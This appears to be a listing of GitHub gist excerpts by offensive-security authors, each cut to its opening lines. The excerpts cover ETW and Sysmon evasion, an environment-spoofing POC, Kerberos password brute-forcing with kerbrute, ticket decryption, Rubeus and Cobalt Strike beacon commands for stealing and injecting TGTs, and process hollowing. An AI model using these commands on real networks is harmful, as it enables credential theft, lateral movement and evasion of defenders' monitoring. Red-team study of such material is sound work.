Flangvik

using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.IO;
using System.Linq;
using System.Text;

namespace MuteSysmon
{
    class Program

xpn

// A very rough x64 POC for spoofing environment variables similar to argument spoofing with a focus on
// setting the COMPlus_ETWEnabled=0 var for disabling ETW in .NET.
//
// Works by launching the target process suspended, reading PEB, updates the ptr used to store environment variables,
// and then resuming the process.
//
// (https://blog.xpnsec.com/hiding-your-dotnet-complus-etwenabled/)

#define INJECT_PARAM L"COMPlus_ETWEnabled=0\0\0\0"
#define INJECT_PARAM_LEN 43

X-C3LL

#!/usr/bin/python
#coding: utf-8

# F-Isolation v0.1 - F**k isolated enviroments

# Because we hate that kind of pentests where you start at an isolated citrix where our
# clipboard is useless, we do not have internet access inside the machine and we can not
# map a local resource to upload our tools.

# OCR + Keyboard emulation FTW!

TarlogicSecurity

Kerberos cheatsheet

Bruteforcing

With kerbrute.py:

python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With Rubeus version with brute module:

xan7r

#!/usr/bin/env python2
# NOTE: this script was created for educational purposes to assist learning about kerberos tickets.  
#   Likely to have a few bugs that cause it to fail to decrypt some TGT or Service tickets.
#
# Recommended Instructions:
#   Obtain valid kerberos tickets using Rubeus or mimikatz "sekurlsa::tickets /export"
#   Optionally convert tickets to ccache format using kekeo "misc::convert ccache <ticketName.kirbi>"
#   Obtain appropriate aes256 key using dcsync (krbtgt for TGT or usually target computer account for Service Ticket)
#   Run this script to decrypt:
#     ./decryptKerbTicket.py -k 5c7ee0b8f0ffeedbeefdeadbeeff1eefc7d313620feedbeefdeadbeefafd601e -t ./[email protected][email protected] 

HarmJ0y

##### IF ELEVATED:

# grab a TGT b64 blob with a valid NTLM/rc4 (or /aes256:X)
beacon> execute-assembly /home/specter/Rubeus.exe asktgt /user:USER /rc4:NTLM_HASH

# decode the base64 blob to a binary .kirbi
$ base64 -d ticket.b64 > ticket.kirbi

# sacrificial logon session (to prevent the TGT from overwriting your current logon session's TGT)
beacon> make_token DOMAIN\USER PassWordDoesntMatter

NaniteFactory

package main

//#include "dllmain.h"
import "C"

nstarke

// Most of this taken from https://stackoverflow.com/a/19780129 with some edits.

#ifndef _WIN32_WINNT
// Windows XP
#define _WIN32_WINNT 0x0501
#endif
#define MAX_PATH 0xFF
#include <Windows.h>
#include <Psapi.h>  
#include <iostream>

smgorelik

/***************
 * Simple Process Hollowing in C# 
 *
 * #Build Your Binaries
 * 		c:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe Hollowing.cs /unsafe
 *  
 *  @author: Michael Gorelik <smgorelik@gmail.com>
 *  gist.github.com/smgorelik/9a80565d44178771abf1e4da4e2a0e75
 * #Most of the code taken from here: @github: github.com/ambray

xpn

#include "stdafx.h"

BOOL SetPrivilege(HANDLE hToken, LPCTSTR Privilege, BOOL bEnablePrivilege) {
	TOKEN_PRIVILEGES tp;
	LUID luid;
	TOKEN_PRIVILEGES tpPrevious;
	DWORD cbPrevious = sizeof(TOKEN_PRIVILEGES);

	if (!LookupPrivilegeValue(NULL, Privilege, &luid)) return FALSE;